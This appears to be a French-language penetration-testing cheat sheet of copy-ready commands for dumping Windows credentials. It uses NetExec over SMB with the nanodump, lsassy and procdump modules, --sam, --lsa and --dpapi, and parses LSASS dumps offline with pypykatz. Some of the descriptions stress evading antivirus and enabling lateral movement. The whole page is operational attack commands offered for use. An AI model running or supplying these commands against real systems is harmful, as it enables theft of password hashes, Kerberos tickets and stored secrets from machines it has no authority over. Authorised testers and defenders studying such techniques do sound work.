Copy command
nxc smb $TARGET -u $USER -p $PASS -M nanodumpDescription: Dump LSASS via nanodump : discret, ne touche pas le processus lsass.exe directement.
Windows Privilege Escalation
Credential Dumping
Extraire des credentials depuis LSASS, SAM, LSA et DPAPI sur les machines Windows.
LSASS
Copy command
nxc smb $TARGET -u $USER -p $PASS -M lsassyDescription: lsassy : dump et parse LSASS en une seule opération, retourne les creds directement.
Copy command
nxc smb $TARGET -u $USER -p $PASS -M procdumpDescription: Dump via procdump.exe (Sysinternals) : bruyant mais souvent autorisé par les AV.
Copy command
pypykatz lsa minidump lsass.dmpDescription: Parser un minidump LSASS offline via pypykatz : extraire NT hashes et tickets Kerberos.
SAM & Registry
Copy command
nxc smb $TARGET -u $USER -p $PASS --samDescription: Dump SAM via NXC : hashes des comptes locaux, utile pour le mouvement latéral.
Copy command
nxc smb $TARGET -u $USER -p $PASS --lsaDescription: LSA secrets : mots de passe en cache, comptes de service, DCC2 hashes.
Copy command
nxc smb $TARGET -u $USER -p $PASS --dpapiDescription: Dump DPAPI : clés maîtresses et secrets protégés (passwords manager, wifi, etc.).
Copy command
nxc smb $TARGET -u $USER -p $PASS --sam --lsa --dpapiDescription: Collecte complète en une passe : SAM + LSA + DPAPI pour tout récupérer d'un coup.